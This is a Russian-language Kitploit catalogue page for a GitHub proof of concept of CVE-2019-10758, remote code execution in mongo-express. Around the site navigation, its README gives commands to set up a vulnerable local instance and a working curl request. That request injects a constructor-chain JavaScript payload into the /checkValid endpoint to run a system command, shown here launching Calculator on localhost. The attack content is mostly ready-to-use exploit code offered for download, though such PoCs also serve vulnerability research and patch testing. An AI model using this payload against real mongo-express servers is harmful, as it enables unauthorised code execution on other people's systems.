Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-10758 — Эксплойт proof-of-concept для CVE-2019-10758, демонстрирующий удалённое выполнение кода в mongo-express через внедрение специально сформированного документа. Включает payload'ы на основе curl и скриптов. | Kitploit
Инструменты/GitHubGitHub/masahiro331/cve-2019-10758
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubmasahiro331/cve-2019-10758

CVE-2019-10758

Эксплойт proof-of-concept для CVE-2019-10758, демонстрирующий удалённое выполнение кода в mongo-express через внедрение специально сформированного документа. Включает payload'ы на основе curl и скриптов.

Репозиторий
1112186 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-10758 PoC

Установка

docker run -p 27017:27017 -d mongo
npm install [email protected] 
cd node_modules/mongo-express/ && node app.js

Эксплойт через cURL

curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")'

Эксплойт через скрипт

node main.js
Скачать инструмент